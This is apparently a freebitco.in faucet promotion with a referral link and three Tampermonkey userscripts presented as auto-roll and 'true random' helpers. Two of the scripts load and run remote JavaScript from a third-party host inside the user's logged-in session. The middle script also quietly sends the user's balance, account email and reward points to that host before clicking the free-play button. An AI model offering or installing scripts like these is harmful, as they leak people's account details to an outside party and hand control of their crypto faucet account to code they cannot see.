This game is provably fair!

https://freebitco.in/?r=17877647

https://drive.google.com/open?id=1ymThRu6JdHz6X1Itwn_I6mFkcHFZLK5Y

// ==UserScript==
// @name         New Userscript
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  try to take over the world!
// @author       You
// @match        *://freebitco.in/*
// @grant        none
// ==/UserScript==

(function() {
    'use strict';
    $.getScript( "https://resonance.id.lv/freebitco.in/free-roll.js" );
})();

// ==UserScript==
// @name         New Userscript
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  try to take over the world!
// @author       You
// @match        *://freebitco.in/*
// @grant        none
// ==/UserScript==

(function() {
    'use strict';
    setTimeout(
    function() {
      RedeemRPProduct('free_points_100');
$.get("https://resonance.id.lv/freebitco.in/ajax.php?a=log&balance="+$("#balance").text()+"&email="+$("#edit_profile_form_email").val()+"&rp="+$(".user_reward_points").text()+"&status="+$(".free_play_bonus_box_span_large").html()+"&payout="+$("#fp_min_reward").text());


        var checkExist = setInterval(function() {
            if ($('#free_play_form_button').length) {
                if ($("#free_play_form_button").is(":visible"))
                {
                    $("#free_play_form_button").click()
                    clearInterval(checkExist);
                }
            }
        }, 5000); // check every 100ms


    }, 5000);
    // Your code here...
})();

True random script

    
// ==UserScript==
// @name         New Userscript
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  try to take over the world!
// @author       You
// @match        *://freebitco.in/*
// @grant        none
// ==/UserScript==

(function() {
    'use strict';
    $.getScript( "https://resonance.id.lv/freebitco.in/true-random.js" );
})();